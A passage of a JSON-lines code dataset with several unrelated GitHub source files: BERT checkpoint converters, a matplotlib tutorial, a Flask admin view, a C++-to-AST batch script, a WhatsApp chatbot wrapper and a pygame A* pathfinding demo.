As a result, the\"\n            \" optimizer state won't be included in the converted checkpoint.\".format(\n                *self.formats()\n            )\n        )\n        return {\"model\": checkpoint[\"model\"]}\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n    @classmethod\n    def converter_note(cls) -> str:\n        return \"BertPretrainModel class\"\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_CS16_CS18\n\n\nclass Converter_BertPretrainModel_HF_CS17(\n    Converter_BertPretrainModel_CS16_CS17, BaseCheckpointConverter_HF_CS\n):\n    def __init__(self):\n        super().__init__()\n\n    def pre_model_convert(\n        self,\n        old_state_dict,\n        new_state_dict,\n        configs,\n        from_index,\n        drop_unmatched_keys,\n    ):\n        # Manually tie weights\n        if from_index == 1 and configs[1][\"model\"][\"share_embedding_weights\"]:\n            if (\n                old_state_dict.get(\n                    \"bert_encoder.embedding_layer.word_embeddings.weight\", 0\n                )\n                is None\n            ):\n                old_state_dict[\n                    \"bert_encoder.embedding_layer.word_embeddings.weight\"\n                ] = old_state_dict[\n                    \"bert_mlm_head.classifier.ffn.0.linear_layer.weight\"\n                ]\n\n    def post_checkpoint_convert(\n        self, checkpoint, from_index: int,\n    ):\n        return BaseCheckpointConverter_HF_CS.post_checkpoint_convert(\n            self, checkpoint, from_index\n        )\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.7\"))\n\n    @classmethod\n    def converter_note(cls) -> str:\n        return \"{} <-> {} for BertForPreTraining\".format(\n            cls.formats()[0], cls.formats()[1]\n        )\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_HF_CS17\n\n\nclass Converter_BertPretrainModel_HF_CS18(Converter_BertPretrainModel_HF_CS17):\n    def __init__(self):\n        super().__init__()\n        self.rules = [\n            # Catch checkpoints from PyTorch 2.0 API\n            ConversionRule(\n                [Converter_BertPretrainModel_HF_CS17(),], action=None,\n            ),\n            # Catch checkpoints from deprecated PyTorchBaseModel\n            ConversionRule(\n                [\n                    EquivalentSubkey(\"\", \"model.\"),\n                    Converter_BertPretrainModel_HF_CS17(),\n                ],\n                action=None,\n            ),\n        ]\n\n    @staticmethod\n    def formats() -> Tuple[FormatVersions, FormatVersions]:\n        return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n    @classmethod\n    def converter_note(cls) -> str:\n        return \"{} <-> {} for BertForPreTraining\".format(\n            cls.formats()[0], cls.formats()[1]\n        )\n\n    @staticmethod\n    def get_config_converter_class() -> BaseConfigConverter:\n        return ConfigConverter_Bert_HF_CS18\n\n\nclass ConfigConverter_Bert_HF_CS17(BaseConfigConverter_HF_CS):\n    def __init__(self):\n        super().__init__()\n        self.rules = [\n            # Embedding\n            ConversionRule([\"vocab_size\"], action=self.replaceKey),\n            ConversionRule(\n                [\"position_embedding_type\"],\n                action=self.convert_position_embedding_type,\n            ),\n            ConversionRule(\n                [\"max_position_embeddings\"], action=self.replaceKey,\n            ),\n            ConversionRule(\n                [\n                    EquivalentSubkey(\n                        \"tie_word_embeddings\", \"share_embedding_weights\"\n                    )\n                ],\n                action=self.replaceKey,\n            ),\n            # Decoder Block\n            ConversionRule([\"hidden_size\"], action=self.replaceKey,),\n            ConversionRule(\n                [EquivalentSubkey(\"num_attention_heads\", \"num_heads\")],\n                action=self.replaceKey,\n            ),\n            ConversionRule([\"num_hidden_layers\"], action=self.replaceKey,),\n            ConversionRule(\n                [EquivalentSubkey(\"intermediate_size\", \"filter_size\")],\n                action=self.replaceKey,\n            ),\n            ConversionRule(\n                
[EquivalentSubkey(\"hidden_act\", \"encoder_nonlinearity\")],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\"mlm_nonlinearity\"], action=self.assert_mlm_nonlinearity,\n ),\n ConversionRule(\n [\"pooler_nonlinearity\"],\n action=BaseConfigConverter.assert_factory_fn(1, \"tanh\"),\n ),\n ConversionRule(\n [EquivalentSubkey(\"hidden_dropout_prob\", \"dropout_rate\")],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"attention_probs_dropout_prob\", \"attention_dropout_rate\"\n )\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\"disable_nsp\"],\n action=BaseConfigConverter.assert_factory_fn(1, False),\n ),\n ConversionRule(\n [\"type_vocab_size\"],\n action=BaseConfigConverter.assert_factory_fn(0, 2),\n ),\n ConversionRule(\n [\"is_decoder\"],\n action=BaseConfigConverter.assert_factory_fn(0, False),\n ),\n ConversionRule(\n [\"add_cross_attention\"],\n action=BaseConfigConverter.assert_factory_fn(0, False),\n ),\n ConversionRule(\n [EquivalentSubkey(\"layer_norm_eps\", \"layer_norm_epsilon\")],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\"attention_type\"],\n action=BaseConfigConverter.assert_factory_fn(\n 1, \"scaled_dot_product\"\n ),\n ),\n ConversionRule(\n [\"use_projection_bias_in_attention\"],\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_ffn_bias_in_attention\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_ffn_bias\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_ffn_bias_in_mlm\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_output_bias_in_mlm\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule([\"initializer_range\"], action=self.replaceKey),\n ]\n\n def convert_position_embedding_type(\n self,\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n ):\n\n # HF supports absolute, relative_key, relative_key_query\n # CS supports learned, fixed\n\n embed_type = old_state_dict[old_key]\n\n if from_index == 0:\n if embed_type == \"absolute\":\n new_state_dict[new_key] = \"learned\"\n else:\n raise ConfigConversionError(\n \"CS model doesn't support HF's position_embedding_type={}\".format(\n embed_type\n )\n )\n else:\n if embed_type == \"learned\":\n new_state_dict[new_key] = \"absolute\"\n else:\n raise ConfigConversionError(\n \"HF model doesn't support CS's position_embedding_type={}\".format(\n embed_type\n )\n )\n\n def assert_mlm_nonlinearity(\n self,\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n ):\n if old_state_dict[old_key] != old_state_dict[\"encoder_nonlinearity\"]:\n raise ConfigConversionError(\n \"HF model doesn't support different encoder & mlm nonlinearities\"\n )\n\n def pre_config_convert(\n self, config, from_index,\n ):\n config = super().pre_config_convert(config, from_index)\n\n defaults = [\n {\n \"vocab_size\": 30522,\n \"hidden_size\": 768,\n \"num_hidden_layers\": 12,\n \"num_attention_heads\": 12,\n \"intermediate_size\": 3072,\n \"hidden_act\": \"gelu\",\n \"hidden_dropout_prob\": 0.1,\n \"attention_probs_dropout_prob\": 0.1,\n \"max_position_embeddings\": 512,\n \"layer_norm_eps\": 1e-12,\n \"tie_word_embeddings\": True,\n },\n {\"share_embedding_weights\": True, \"encoder_nonlinearity\": \"gelu\",},\n ]\n\n # Apply defaults\n for key in 
defaults[from_index]:\n if key not in config:\n config[key] = defaults[from_index][key]\n\n return config\n\n def post_config_convert(\n self,\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n ):\n if from_index == 0:\n if \"enable_vts\" not in new_config:\n new_config[\"enable_vts\"] = False\n if (\n \"mlm_nonlinearity\" not in new_config\n and \"encoder_nonlinearity\" in new_config\n and new_config[\"encoder_nonlinearity\"] != \"gelu\"\n ):\n logging.warning(\n \"HF used a mlm_nonlinearity of {} while CS 1.7 is fixed to gelu. Please use CS 1.8 if you want to control mlm_nonlinearity\".format(\n new_config[\"encoder_nonlinearity\"]\n )\n )\n new_config[\"mlm_nonlinearity\"] = \"gelu\"\n\n return super().post_config_convert(\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n )\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.7\"))\n\n\nclass ConfigConverter_Bert_HF_CS18(ConfigConverter_Bert_HF_CS17):\n def __init__(self):\n super().__init__()\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n def pre_config_convert(\n self, config, from_index,\n ):\n config = super().pre_config_convert(config, from_index)\n if from_index == 1:\n if \"pooler_nonlinearity\" not in config:\n if config[\"encoder_nonlinearity\"] != \"tanh\":\n raise ConfigConversionError(\n \"CS Model used a pooler_nonlinearity of {} according to encoder_nonlinearity. HF only supports tanh in the pooler nonlinearity\".format(\n config[\"encoder_nonlinearity\"]\n )\n )\n return config\n\n def post_config_convert(\n self,\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n ):\n if from_index == 0:\n new_config[\"pooler_nonlinearity\"] = \"tanh\"\n if \"mlm_nonlinearity\" not in new_config:\n new_config[\"mlm_nonlinearity\"] = new_config[\n \"encoder_nonlinearity\"\n ]\n\n return super().post_config_convert(\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n )\n","repo_name":"Cerebras/modelzoo","sub_path":"modelzoo/common/pytorch/model_utils/checkpoint_converters/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":31297,"program_lang":"python","lang":"en","doc_type":"code","stars":747,"dataset":"github-code","pt":"77"} +{"seq_id":"29913243248","text":"\"\"\"\n arghelper\n Intended to provide some helper functions for parsing arguments.\n\"\"\"\nimport os\n\n# Checks whether an argument is a valid file\n# Source: http://codereview.stackexchange.com/questions/28608/checking-if-cli-arguments-are-valid-files-directories-in-python\ndef is_valid_file(parser, arg):\n if not os.path.isfile(arg):\n parser.error('The file {} does not exist!'.format(arg))\n else:\n # File exists so return the filename\n return arg\n\ndef generate_argparse(parser):\n # Required\n parser.add_argument(\"messages_file\",\n help=\"path to your Facebook generated messages file\",\n type=lambda x: is_valid_file(parser, x))\n\n # Optional\n parser.add_argument(\"-o\", \"--out\",\n help=\"desired output file for PNG of word cloud\")\n","repo_name":"iconix/fb-chat-rnn","sub_path":"fb_chat_rnn/arghelper.py","file_name":"arghelper.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40412614408","text":"#!/usr/bin/env python3\n# -*- 
coding=utf-8 -*-\n# test for python code\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(-3,3,50) # define the range and the number of points\n#print(x)\n#y = 2*x+1\ny=0.1*x\n#y1 = 2*x+1\n#y2 = x**2\n\nplt.figure()\n#plt.figure(num=1,figsize=(8,5),)\n#plt.figure(num = 3,figsize = (8,5)) # separate small window; num is the figure number, figsize its size\n\n# Setting up the axes - basics\n#plt.xlim((-1,2)) # set the x-axis range\n#plt.ylim((-2,3)) # set the y-axis range\nplt.ylim(-2,2)\n#plt.xlabel('I am x') # set the x-axis label\n#new_sticks = np.linspace(-1,2,5)\n#plt.xticks(new_sticks) # set the x-axis ticks\n#plt.ylabel('I am y') # set the y-axis label\n#plt.yticks([-2,-1.8,-1,1.22,3],[r'$really\\ bad$',r'$bad$',r'$normal$',r'$good$',r'$really\\ good$']) # set the y-axis ticks\n\n# Setting up the axes - repositioning the spines\nax = plt.gca() # get the current axes\nax.spines['right'].set_color('none') # right spine; set the spine color (default is white)\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom') # put the x tick numbers/labels at the bottom (all positions: top, bottom, both, default, none)\nax.spines['bottom'].set_position(('data',0)) # set the spine position: at y = 0 (all position options: outward, axes, data)\nax.yaxis.set_ticks_position('left')\nax.spines['left'].set_position(('data',0))\n\n# Setting up the axes - tick visibility\nfor label in ax.get_xticklabels() + ax.get_yticklabels():\n    label.set_fontsize(12) # readjust the font size\n    # in plt 2.0.2 or higher, set zorder to order the plot along the z direction\n    label.set_bbox(dict(facecolor='white',edgecolor='None',alpha=0.7,zorder=2)) # bbox: transparency-related settings for the target content: {facecolor: box background color, edgecolor: box border (none here), alpha: transparency}\n# Legend: adding a legend\n#l1,=plt.plot(x,y1,label='linear line') # trailing comma after l1: plt.plot() returns a list\n#l2,=plt.plot(x,y2,color = 'red',linewidth = 1.0,linestyle = '--',label='square line') # color: curve color, linewidth: line width, linestyle: line style, label: legend name\n#plt.legend(loc='upper right') # loc: the legend is placed in the upper right corner\n#plt.legend(handles=[l1,l2],labels=['up','down'],loc='best') # 'best': automatically picks the best position, loc options: {'best':0,'upper right':1,'upper left':2,'lower left':3,'lower right':4,'right':5,'center left':6,'center right':7,'lower center':8,'upper center':9,'center':10,}\n\n# Annotation\n#x0 = 1\n#y0 = 2*x0 + 1\n#plt.plot([x0,x0,],[0,y0,],'k--',linewidth=2.5)\n#plt.plot(x,y,)\nplt.plot(x,y,linewidth=10,zorder=1) # in plt 2.0.2 or higher, set zorder to order the plot along the z direction\n#plt.scatter([x0,],[y0,],s=50,color='b') # set the point style\n# using plt's annotate\n#plt.annotate(r'$2x+1=%s$' % y0,xy=(x0,y0),xycoords='data',xytext=(+30,-30),\n#             textcoords='offset points',fontsize=16,\n#             arrowprops=dict(arrowstyle='->',connectionstyle=\"arc3,rad=.2\"))\n# xycoords='data': choose the position based on data values, xytext=(+30,-30): offset describing the annotation position, textcoords='offset points': the xy offset of the annotation position, arrowstyle: the type of arrow drawn in the figure\n# using plt's text directly\n#plt.text(-3.7,3,r'$This\\ is\\ the\\ some\\ text.\\mu\\ \\sigma_i\\ \\alpha_t$',\n#         fontdict={'size':16,'color':'r'})\n# -3.7,3: the position of the text; the \\ escape character escapes the spaces; fontdict sets the text font\nplt.show()\n\n","repo_name":"miaoxiaozui2017/PythonDemoWithNotes","sub_path":"matplotlib-test/matplotlib-test01.py","file_name":"matplotlib-test01.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73021278648","text":"from flask import (\n    Blueprint,\n    redirect,\n    request,\n    flash,\n    url_for,\n    render_template)\nfrom flask_login import login_required, current_user\nfrom sqlalchemy import text\n\nfrom todos.blueprints.user.decorators import role_required\nfrom todos.blueprints.user.models import User\nfrom todos.blueprints.admin.forms import (\n    SearchForm,\n    UserForm\n)\n\nadmin = Blueprint('admin', __name__,\n                  template_folder='templates', url_prefix='/admin')\n\n\n@admin.before_request\n@login_required\n@role_required('admin')\ndef before_request():\n    \"\"\" Protect all of the admin endpoints. 
\"\"\"\n pass\n\n\n# Users -----------------------------------------------------------------------\n@admin.route('/users', defaults={'page': 1})\n@admin.route('/users/page/')\ndef users(page):\n search_form = SearchForm()\n\n sort_by = User.sort_by(request.args.get('sort', 'created_on'),\n request.args.get('direction', 'desc'))\n order_values = '{0} {1}'.format(sort_by[0], sort_by[1])\n\n search_query = request.args.get('q', '')\n\n paginate_users_query = User.query\n\n if search_query:\n paginate_users_query = paginate_users_query.filter(User.search(search_query))\n\n paginated_users = paginate_users_query \\\n .order_by(User.role.asc(), text(order_values)) \\\n .paginate(page, 20, True)\n\n return render_template('admin/user/index.html',\n form=search_form,\n users=paginated_users)\n\n\n@admin.route('/users/edit/', methods=['GET', 'POST'])\ndef users_edit(id):\n user = User.query.get(id)\n form = UserForm(obj=user)\n\n if form.validate_on_submit():\n if User.is_last_admin(user,\n request.form.get('role'),\n request.form.get('active')):\n flash('You are the last admin, you cannot do that.', 'error')\n return redirect(url_for('admin.users'))\n\n form.populate_obj(user)\n\n if not user.username:\n user.username = None\n\n user.save()\n\n flash('User has been saved successfully.', 'success')\n return redirect(url_for('admin.users'))\n\n return render_template('admin/user/edit.html', form=form, user=user)\n\n\n@admin.route('/users/bulk_delete', methods=['POST'])\ndef users_bulk_delete():\n ids = User.get_bulk_action_ids(request.form.getlist('bulk_ids'),\n omit_ids=[current_user.id])\n\n if len(ids):\n delete_count = User.bulk_delete(ids)\n\n flash('{0} user(s) were scheduled to be deleted.'.format(delete_count),\n 'success')\n else:\n flash('No users were deleted, something went wrong.', 'error')\n\n return redirect(url_for('admin.users'))\n","repo_name":"dev-rijan/flask-todo","sub_path":"todos/blueprints/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"10365309103","text":"import numpy as np\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\n\n# Utilities for common ops\ndef area_avg(x):\n return x.weighted(np.cos(np.deg2rad(x.lat))).mean(('lat', 'lon'))\n\ndef calc_anom(x):\n xclim = x.groupby('time.month').mean()\n return x - xclim.sel(month=x.time.dt.month)\n\ndef plot_map(x, title, units, **kwargs):\n ax = plt.axes(projection=ccrs.PlateCarree())\n p = x.plot(ax=ax, transform=ccrs.PlateCarree(), cbar_kwargs=dict(label=units, orientation='horizontal'), **kwargs)\n ax.set_global()\n ax.coastlines()\n plt.title(title)\n return p\n\n","repo_name":"cmda-jpl/cmda_notebooks","sub_path":"cmda_utils.py","file_name":"cmda_utils.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"33611011351","text":"\"\"\"\ntransfer cpp file to ast file without include file\n\"\"\"\nimport json\nfrom progress import process_cpp_file\nimport threading\nimport time\nimport multiprocessing\n\n\ndef process_problem(problem_id, problem):\n print('start transfer problem %s-->%s acc cpp file to ast file without include file' % (\n problem_id, problem['title']))\n\n # travel acc\n count = 0\n for solution in problem['acc']:\n t = threading.Thread(target=process_cpp_file, args=(solution,))\n t.setDaemon(True)\n t.start()\n # sleep 5 sec per 100 thread start\n count += 1\n 
if count == 30:\n            time.sleep(4)\n            count = 0\n    print('transfer problem %s-->%s acc cpp file to ast file without include file OK' % (problem_id, problem['title']))\n\n\n# init solution list\nwith open('./problem_types.json', 'r', encoding='utf-8') as f:\n    problem_types = json.load(f)['problem_types']\n\n# travel problem\nfor problem_id, problem in problem_types.items():\n    pool = multiprocessing.Pool(processes=4)\n    pool.apply_async(func=process_problem, args=(problem_id, problem))\n    pool.close()\n    pool.join()\n\nprint('transfer all source code to ast tree OK')\n","repo_name":"fengjunhui/ProgramAnalysis-GGNN","sub_path":"cpp_to_ast.py","file_name":"cpp_to_ast.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"7300008304","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport time\nimport re\nfrom functools import wraps, partial\nfrom webwhatsapi import WhatsAPIDriver\n\nimport emoji\n\n## TODO\n# define class error\n# \n\nclass Bot(object):\n    '''\n    This class' purpose is to provide chatbot core needs.\n    '''\n    \n    def __init__(self, **kwargs):\n        \"\"\"Initialises a new driver via webwhatsapi module\n        \n        @param client_id: ID of user client or botname\n        @param profile_path: path to store user data\n        @\n        \"\"\"\n        # Gather the kwargs that will be used most\n        client_id = kwargs.get('client_id', 'wabot')\n        profile_path = kwargs.get('profile_path', os.getcwd())\n\n        # Create profile directory if it does not exist\n        profile_path = os.path.join(profile_path + '/' + str(client_id))\n        if not os.path.exists(profile_path):\n            os.makedirs(profile_path)\n        \n        # Options to customize chrome window\n        chrome_options = [\n            'window-size=' + kwargs.get('windows_size', \"910,512\"),\n            '--user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/60.0.3112.78 Chrome/60.0.3112.78 Safari/537.36'\n        ]\n        if kwargs.get('is_headless', True):\n            chrome_options.append('--headless')\n        if kwargs.get('is_disable_gpu', True):\n            chrome_options.append('--disable-gpu')\n        \n        self.attributes = []\n        self.properties = {}\n\n        # Create a whatsapidriver object\n        self.driver = WhatsAPIDriver(\n            username=client_id, \n            profile=profile_path, \n            client='chrome', \n            chrome_options=chrome_options\n        )\n        # super().__init__()\n    \n    def setup(self, **kwargs):\n        for p,configs in kwargs.get('config').items():\n            for c in configs:\n                self.getattribute(p).setup(**c)\n\n    def plugin(self, **kwargs):\n        try:\n            name = kwargs.get('name').split(\"/\")\n            name = name[len(name) - 1]\n            print('Loading Plugin {}'.format(name))\n            sys.path.append(kwargs.get('path'))\n            module = __import__(name)\n            __class__ = getattr(module, name.title())\n            instance = __class__(driver=self.driver)\n            # print(\"attributes append {}\".format(name))\n            self.attributes.append(name)\n            self.setattr(name, instance)\n            # print(str(self.getattribute(name)))\n        except Exception as e:\n            print(e)\n\n    def getattribute(self, key):\n        \"\"\"\n        get bot's attribute\n        \"\"\"\n        if key in self.attributes:\n            return self.properties[key]\n        else:\n            self.driver.quit()\n            raise Exception(\"no {} attribute found\".format(key))\n\n    def setattr(self, key, val):\n        \"\"\"\n        set bot's attribute\n        \n        @key : key like in dict data type\n        @val : value for the key\n        \"\"\"\n        if key in self.attributes:\n            self.properties[key] = val \n        else:\n            self.driver.quit()\n            raise Exception(\"no {} attribute defined\".format(key))\n\n    def run(self, **kwargs):\n        driver = self.driver\n        if not 
driver.is_logged_in():\n print(\"Waiting for login\")\n driver.wait_for_login()\n print(\"Bot started\")\n\n driver.subscribe_new_messages(MessageObserver(driver, **kwargs))\n print(\"Waiting for new messages...\")\n\n \"\"\" Locks the main thread while the subscription in running \"\"\"\n while True:\n time.sleep(kwargs.get('frameTime', 60))\n\nclass MessageObserver:\n def __init__(self, driver, **kwargs):\n self.driver = driver\n self.callbacks = kwargs.get('callbacks')\n print(locals())\n\n def on_message_received(self, new_messages):\n for message in new_messages:\n for fn in self.callbacks:\n fn(message)\n\nclass BotDecorator(object):\n class IsMagicWord(object):\n def __init__(self, k):\n self.k = k\n \n def __call__(self, f, *args, **kwargs):\n def wrapper(*args, **kwargs):\n try:\n if args[1].content.lower().find(self.k) == 0:\n # print(\"MagicWord is {}\".format(self.k)) \n f(*args, **kwargs)\n except Exception as e:\n print(e)\n return wrapper","repo_name":"ilmimris/bagiilmu","sub_path":"01_selenium_from_automation_to_bot/show/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17590522664","text":"import heapq\nfrom random import random\n\nimport pygame\nimport numpy as np\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nGREY = [128, 128, 128]\nWIDTH = 707\nSIZE = 101\nBLOCK_SIZE = WIDTH // SIZE\nLINE_WIDTH = 2\n\n\nclass Tile: # class for each tile, each tile is defined by an (x,y) coordinate as seperate x and y values\n def __init__(self, x, y):\n self.neighbors = [] # neighbors list to iterate through nerighbors\n self.x = x\n self.y = y\n self.initialize = False\n self.is_block = False\n self.color = WHITE\n\n self.f = 0\n self.g = 100000\n self.h = 0\n self.closed = False\n self.parent = None\n\n def __lt__(self, other):\n return self.f < other.f\n\n def __gt__(self, other):\n return self.f > other.f\n\n def get_color(self): # dont really use this method\n return self.color\n\n def color_in(self, window): # use this method to color in each block\n pygame.draw.rect(window, self.color, [self.x * BLOCK_SIZE, self.y * BLOCK_SIZE, BLOCK_SIZE, BLOCK_SIZE])\n\n def get_position(self): # returns the x and y coordinate, useful for comparing two tiles\n return self.x, self.y\n\n def compare_to(self, t): # compares two tiles, useful for seeing if the tile has already been initialized\n return self.x == t.x and self.y == t.y\n\n def add_neighbors(self, t): # adds neighbor for both tiles that are connected via edge\n for n in self.neighbors: # check all neighbors in list\n if n.compare_to(t):\n return # neighbor in list already, do nothing\n\n self.neighbors.append(t) # add t to neighbors list\n t.neighbors.append(self) # add this node to t node's neighbors list\n\n\nclass BinaryHeap:\n # parent is at i // 2\n # left child is at 2*i + 1\n # right child is at 2*i + 2\n def __init__(self, size):\n self.size = size\n self.index = 0\n self.heap = [None] * size\n\n def get_size(self):\n return self.index\n\n def insert(self, data):\n if self.heap[self.index] is None:\n self.heap[0] = data\n else:\n self.index = self.index + 1\n self.heap[self.index] = data\n self.bubble_up(self.index)\n\n def extract(self) -> Tile:\n minVal = self.heap[0] # take min value\n temp = self.heap[self.index] # swap last value with the first value\n self.heap[self.index] = None\n self.index = self.index - 1\n self.heap[0] = temp\n self.sift_down(0) # perform siftdown\n return minVal\n\n def 
sift_down(self, i):\n j = i\n L = 2 * i + 1\n r = 2 * i + 2\n\n if L <= self.index: # if index is left most and you say R <= index because index can be at left and this would be false\n if self.heap[L].f < self.heap[j].f:\n temp = self.heap[j].f\n self.heap[j].f = self.heap[L].f\n self.heap[L].f = temp\n self.sift_down(L)\n elif self.heap[r].f < self.heap[j].f:\n temp = self.heap[j].f\n self.heap[j].f = self.heap[r].f\n self.heap[r].f = temp\n self.sift_down(r)\n else:\n return\n\n def print(self):\n for element in self.heap:\n print(element)\n\n def bubble_up(self, i): # i is the index of the last node inserted (size)\n j = i\n p = j // 2\n\n if i > 0: # make sure node is not the root node - root node has no parents to examine\n if self.heap[j].f < self.heap[p].f: # child is less than the parent\n temp = self.heap[p].f # swap child with parent\n self.heap[p].f = self.heap[j].f\n self.heap[j].f = temp\n self.bubble_up(p) # call bubble up on the p index now\n\n\nclass Graph:\n def __init__(self, size):\n self.rows = size\n self.columns = size\n self.vertices = []\n\n def add_edge(self, t1, t2):\n pass\n\n\ndef draw_main(window, grid): # draws the tiles and their color\n window.fill(BLACK)\n for row in grid:\n for t in row:\n t.color_in(window) # color in tile method\n draw_grid_lines(window) # draws the grid lines\n pygame.display.update() # updates pygame\n\n\ndef draw_grid_lines(win): # draws the grid lines that seperate each tile\n for i in range(SIZE): # draws horizontal lines\n pygame.draw.line(win, GREY, [0, BLOCK_SIZE * i], [SIZE * BLOCK_SIZE, BLOCK_SIZE * i],\n LINE_WIDTH) # draws horizontal lines\n for j in range(SIZE): # draws vertical lines\n pygame.draw.line(win, GREY, [BLOCK_SIZE * j, 0], [BLOCK_SIZE * j, SIZE * BLOCK_SIZE],\n LINE_WIDTH) # draw.line draws starting (x0, xf) (y0, yf)\n\n\ndef make_grid(size): # creates the 2D array that stores all the values of tiles\n grid = [[0 for x in range(size)] for y in range(size)] # creates 2d array\n nodes = size * size * [None]\n i = 0\n for x in range(size):\n for y in range(size):\n grid[x][y] = Tile(x, y) # gives each Tile object a unique coordinate\n nodes[i] = grid[x][y]\n i += 1\n return grid\n\n\ndef give_neighbors(grid): # adds neighbors to each tile but does not initialize\n size = len(grid)\n for y in range(size):\n for x in range(size):\n if x < size - 1: # go to second to last tile because will make neighbor with last tile\n grid[x][y].add_neighbors(grid[x + 1][y]) # adds the neighbors right and down to both tiles\n grid[x][y].add_neighbors(grid[x][y - 1])\n if y == size - 1: # at the last row just add neighbors to the right\n grid[x][y].add_neighbors(grid[x + 1][y])\n\n\ndef dfs_block(list_in, x, y): # method for initializing all blocks via dfs\n stack = [] # empty stack\n start = list_in[x][y] # gets coordinate of starting node\n start.is_block = False\n start.initialize = True\n stack.append(start)\n while len(stack) != 0:\n n = stack.pop() # pop the parent\n for t in n.neighbors: # loop iterates for all children of parent\n if not t.initialize:\n t.initialize = True\n r = np.random.randint(0, 10)\n if r < 3: # gives a 30% chance of being a block\n t.is_block = True\n t.color = BLACK\n stack.append(t) # add neighbor to stack\n\n\ndef calc_f(tile: Tile, end):\n # print(tile.x, tile.y)\n tile.h = abs(end[0] - tile.x) + abs(end[1] - tile.y)\n # print(tile.h, tile.x, tile.y, end)\n tile.f = tile.h + tile.g\n\n\ndef a_star(start, end, grid):\n opened = []\n # opened = BinaryHeap(5000)\n heapq.heapify(opened)\n index = 0\n # 
closed = BinaryHeap(100)\n s = grid[start[0]][start[1]]\n s.g = 0\n heapq.heappush(opened, (0, s))\n # opened.insert(s)\n iteration = 0\n while True:\n iteration += 1\n current = heapq.heappop(opened)[1]\n # current = opened.extract()\n index -= 1\n # print(current.parent)\n if (current is None):\n return\n current.color = \"GREEN\"\n current.closed = True\n\n if current.x == start[0] and current.y == start[1] and iteration != 1:\n for n in current.neighbors:\n if (n.g + 1 < current.g):\n current.parent = n\n return\n\n if current.x == end[0] and current.y == end[1]:\n return opened\n # print(current.neighbors)\n for n in current.neighbors:\n if n.closed or n.is_block or n is None:\n continue\n n.g = current.g + 1\n print(n.g, current.g)\n if n.g > current.g or not n.closed:\n calc_f(n, end)\n n.parent = current\n\n if not n.closed:\n index += 1\n # opened.insert(n)\n heapq.heappush(opened, (n.f, n))\n\n\ndef draw_path(start, end, grid):\n current: Tile = grid[end[0]][end[1]]\n while True:\n if current is None:\n return\n if (current == grid[start[0]][start[1]]):\n return\n current.color = \"RED\"\n current = current.parent\n # print(current.g, current.h)\n # print(current.neighbors)\n\n\ndef main():\n pygame.init()\n game_window = pygame.display.set_mode((WIDTH, WIDTH))\n pygame.display.set_caption(\"A* Path Finding Algo\")\n\n my_grid = make_grid(SIZE) # makes [100][100] and populates with tiles\n give_neighbors(my_grid) # adds neighbors to tiles\n\n dfs_block(my_grid, 50, 50) # makes tiles blocks or not blocks at starting block\n\n game_exit = False\n\n start = (int(random() * 100), int(random() * 100))\n end = (int(random() * 100), int(random() * 100))\n # start = (50, 50)\n # end = (51, 75)\n # print(start, end)\n\n a_star(start, end, my_grid)\n\n draw_path(start, end, my_grid)\n\n my_grid[start[0]][start[1]].color = \"BLUE\"\n my_grid[end[0]][end[1]].color = \"BLUE\"\n\n while not game_exit:\n for event in 